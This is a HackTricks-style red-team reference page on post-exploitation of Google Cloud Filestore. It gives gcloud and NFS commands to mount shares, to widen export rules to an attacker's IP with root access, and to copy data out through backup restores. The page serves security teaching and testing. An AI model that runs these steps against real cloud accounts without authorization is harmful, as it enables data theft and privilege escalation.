GCP - Filestore Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Filestore

For more information about Filestore check:

Mount Filestore

A shared filesystem might contain sensitive information interesting from an attackers perspective. With access to the Filestore it's possible to mount it:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

To find the IP address of a filestore insatnce check the enumeration section of the page:

pageGCP - Filestore Enum

Remove Restrictions and get extra permissions

If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:

gcloud filestore instances update nfstest \
    --zone=<exact-zone> \
    --flags-file=nfs.json

# Contents of nfs.json
{
  "--file-share":
  {
    "capacity": "1024",
    "name": "<share-name>",
    "nfs-export-options": [
      {
        "access-mode": "READ_WRITE",
        "ip-ranges": [
          "<your-ip-private-address>/32"
        ],
        "squash-mode": "NO_ROOT_SQUASH",
        "anon_uid": 1003,
        "anon_gid": 1003
      }
    ]
  }
}

Restore a backup

If there is a backup it's possible to restore it in an existing or in a new instance so its information becomes accessible:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
    --zone=<zone> \
    --tier=STANDARD \
    --file-share=name=vol1,capacity=1TB \
    --network=name=default,reserved-ip-range=10.0.0.0/29
    
# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
    --zone=<zone> \
    --file-share=<instance-file-share-name> \
    --source-backup=<backup-name> \
    --source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Create a backup and restore it

If you don't have access over a share and don't want to modify it, it's possible to create a backup of it and restore it as previously mentioned:

# Create share backup
gcloud filestore backups create <back-name> \
    --region=<region> \
    --instance=<instance-name> \
    --instance-zone=<instance-zone> \
    --file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 2 months ago